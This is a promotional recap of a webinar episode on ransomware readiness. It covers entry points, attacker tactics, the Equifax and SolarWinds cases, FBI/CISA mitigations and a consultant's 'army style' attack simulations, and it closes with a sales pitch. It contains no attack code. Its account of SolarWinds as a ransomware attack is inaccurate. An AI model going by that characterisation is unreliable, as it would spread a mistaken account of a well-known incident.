This Cybersecurity Insider episode discusses ransomware readiness. The episode features a webinar collaboration between Abrahams Consulting and 2Secure.
Yigal presents the webinar, which spotlights the growing threat of ransomware with attacks increasing by 15% annually.
Ransomware – What’s That?
Yigal starts by putting the slides into motion. Before discussing ransomware in detail, it’s important to define the term.
Yigal starts by explaining that ransomware is a type of malicious software or malware that infects computers, smartphones, and tablets. Once it’s on a device, it tries to hide itself to avoid detection.
He then describes how ransomware spreads to other computers within a network, increasing its impact. It then encrypts data, making it inaccessible to the user. The attackers then demand a ransom, usually in bitcoins, in exchange for the decryption key.
Yigal says that even if you have backups, it’s not always enough to recover from a ransomware attack. This is because some ransomware can also encrypt backups. Additionally, he warns that if you don’t pay the ransom, the attackers may release your data online, further damaging your reputation and potentially leading to financial losses.
He also points out that ransomware is designed to be persistent. Even if you try to remove it, it can still linger on your network. The only way to completely get rid of it is to reinstall everything from scratch, which is a time-consuming and costly process.
Ransomware – Common Entry Points
Yigal continues his story by diving into the common entry points for ransomware. He paints a picture of how easily these attacks can happen that compromise your web application security.
He begins with email, the most common entry point. He explains that ransomware can be hidden in links or attachments. When you click a malicious link, it downloads a small piece of code that either downloads the rest of the ransomware or runs directly on your computer. Attachments, often disguised as PDFs or Office documents, can also contain the ransomware payload.
Next, Yigal talks about RDP (Remote Desktop Protocol). He explains that RDP is used to connect remotely to servers, but it can also be a vulnerability if misconfigured. In his experience, open RDP ports are one of the most common findings in firewall reviews, leaving systems exposed to attack.
Web browsing is another way ransomware can get in. Some websites are already compromised, and when you visit them, malicious code can be downloaded and run on your computer without your knowledge. One example Yigal gives is cryptocurrency mining, where your computer’s resources are used to mine bitcoins for the attacker.
Social media and messenger apps are also potential entry points. Malicious links can be sent through messages, and clicking on them can lead to infection. Yigal points out that even desktop versions of messenger apps can be vulnerable.
To illustrate his point, Yigal shows an example of a ransomware email disguised as a FedEx package notification. He stresses the importance of training users to identify these types of attacks, paying close attention to details like the sender’s email address and the nature of the attachment.
Yigal also shows what happens when you open the attachment in the example email. It reveals an encoded JavaScript file, which, when run, would download the rest of the ransomware payload from the attacker’s site, beginning the infection process.
Threats Landscape
Yigal continues his discussion by revealing the tactics attackers are using to infiltrate systems and evade detection.
He begins by explaining a technique called “living off the land.” Attackers exploit legitimate tools like PowerShell and PSExec, which are commonly used by administrators to manage Windows environments. By using these familiar tools, hackers can blend in and avoid raising alarms, making their presence harder to detect.
Next, Yigal talks about the combination of automated compromise followed by human-led farming. He uses the SolarWinds attack as an example, where an automated intrusion paved the way for hackers to manually navigate and exploit the compromised system further. This two-pronged approach demonstrates the sophistication and persistence of modern ransomware attacks.
Backup encryption is another concerning tactic. Ransomware not only targets active data but also seeks to encrypt backups, leaving victims with limited recovery options. This reinforces the importance of having secure and isolated backups that are inaccessible to attackers.
Yigal addresses the exploitation of third-party vendors and the supply chain. He references the SolarWinds and Target breaches, where attackers compromised systems through vulnerabilities in third-party providers. These incidents show how connected our systems are and how a single vulnerability can put everything at risk.
Defender’s Challenge
Yigal transitions into discussing the alarming trends in ransomware attacks, where there’s a need for a new approach to combat this insidious threat.
The 15% average annual increase in ransomware attacks over the past few years poses a formidable challenge for defenders, requiring them to reassess and adapt their security strategies.
Yigal recommends implementing a multi-layered defense mechanism. While traditional antivirus solutions are still necessary, he points out their limitations, especially against zero-day attacks that lack known signatures.
He advocates for focusing on discovering unknown threats, highlighting the need for advanced detection capabilities that go beyond signature-based methods. This involves monitoring for unusual behavior or actions that could indicate a potential attack.
Yigal mentions a service called “threat hunting,” which can help organizations proactively identify and address emerging threats. He also stresses the importance of swift remediation of incidents, aligning with recommendations from the FBI (Federal Bureau of Investigation) and CISA (Cybersecurity and Infrastructure Security Agency).
He suggests having an incident response plan in place and offers assistance in developing or testing these plans to ensure organizations are well-prepared to respond effectively to ransomware incidents.
Case Study: Equifax
Yigal uses the Equifax case to show how a simple oversight can have huge consequences. Equifax failed to install a security update, and hackers got in and stole data for months. This shows how important it is to keep systems up-to-date and to be able to detect threats quickly.
Equifax only found out about the problem much later, and by then the damage was done. The company’s leaders had to quit, their stock price dropped, and their reputation was badly hurt. This story shows how important it is to be proactive about security and not wait until it’s too late.
Case Study: SolarWinds
Yigal also uses the SolarWinds attack to show how patient and resourceful ransomware attackers can be. They were able to stay hidden in SolarWinds’ systems for over a year, planning their attack.
A simple mistake, like using a weak password, gave them a way in. This attack affected not just SolarWinds, but also many other companies and even government agencies. It shows that even security companies can be hacked.
This makes Yigal question if traditional security tools are enough because sometimes they don’t find all the threats. He finishes by saying that the most important thing is to find attacks early and stop them before they do too much damage.
Common Discoveries Methods & Mitigations
Yigal then dives into the strategies used to discover threats and vulnerabilities in systems. He talks about penetration testing, vulnerability assessments, and phishing campaigns as common methods.
He points out that while these methods are useful, they might not be enough. They may not show all the weaknesses in a system, or how well a company can handle an attack if it happens.
Yigal then shifts to discussing common mitigation strategies recommended by the FBI and CISA. These include:
- Backups: He encourages having a regular backup and recovery plan and separating them from the main network to prevent ransomware from encrypting them.
- Updates: Yigal stresses the need for a robust patch management system and process to ensure all systems are updated regularly. This helps address known vulnerabilities before they can be exploited.
- Security Solutions: While acknowledging the importance of antivirus and anti-malware solutions, he points out their limitations, particularly against zero-day attacks. He suggests complementing these solutions with threat hunting services to address those gaps.
- Incident Response Plan: Yigal highlights the necessity of having a well-defined incident response plan that outlines the steps to take in case of a ransomware attack.
- Ransomware Defense: He recommends learning from past ransomware events to reduce exposure to risks. By understanding how previous attacks unfolded, organizations can better prepare themselves for future threats.
Yigal’s main point is that to truly protect against ransomware, you need multiple layers of defense. It’s not enough to just rely on antivirus software or firewalls. You also need to actively look for threats and be ready to respond quickly if something is found.
Ransomware – Army Style
Yigal shifts the focus to his unique approach to ransomware preparedness, drawing inspiration from his military background. He likens preparing for a ransomware attack to military training, emphasizing the importance of constant drills and live simulations.
He explains that just as soldiers train with live ammunition to understand the real consequences of their actions, cybersecurity teams need to practice responding to simulated ransomware attacks. This hands-on experience allows them to familiarize themselves with the tools, procedures, and potential challenges they might face in a real attack, making them better prepared to react effectively when it matters.
Yigal stresses that knowing about the latest threats is important. By staying informed, companies can find and fix problems before they get attacked. He shares a story of how he warned a client about a known threat, which helped them protect themselves.
He says cybersecurity teams can learn from the military. Just as soldiers study past battles, cybersecurity teams should study past ransomware attacks to understand how attackers work (their tactics, techniques, and procedures, or TTPs).
This helps them predict and stop future attacks. He also says that it’s important to be very observant and notice any unusual activity, as this could be a sign of an attack. He compares this to soldiers on the battlefield who must always be alert to their surroundings to detect potential threats.
Malware Attack Simulation – Army Style
Yigal prefers a practical approach to ransomware testing, focusing on realistic scenarios and finding the biggest weaknesses instead of just making a long list of every possible problem.
He describes his approach as “army style,” drawing parallels to his military experience serving at the Israeli Navy for three years. The goal is not to create a laundry list of findings but to pinpoint the specific areas where organizations are most vulnerable to ransomware attacks.
Pitfalls
Yigal points out that traditional security testing often focuses on finding all possible vulnerabilities, which can result in a long list of issues without prioritizing the most important ones.
He believes that many companies focus on meeting compliance-based standards rather than finding the biggest security risks. Instead, his company takes a more focused approach, looking for the weaknesses that attackers are most likely to use.
Yigal says his company’s goal isn’t to find every single problem but to find the most important ones and fix them. He mentions that clients often limit what his company can test, making it harder to find all the vulnerabilities.
He says firewalls are important but points out that misconfigurations are common, such as leaving RDP open to the public. While upgrading to next-generation firewalls can be helpful, Yigal argues that it’s not a complete solution, especially in the current remote work environment where data is often created and accessed on endpoints like laptops and desktops. “So really replacing firewalls [sic] won’t help you. The problem is where the data is being used, being read, being created, meaning on the endpoint on the desktop or the laptop or whatever you use,” he states.
If you’re ready to strengthen your cybersecurity defenses with an “army-style” approach, 2Secure Corp offers comprehensive cybersecurity consulting services for managed defense, threat discovery, and swift remediation. Schedule a consultation today. For more of our informative webinars and engaging podcast episodes, catch them on YouTube, Apple Podcasts, or Spotify. Get expert insights, practical advice, and real-world stories to improve your cyber resilience. Subscri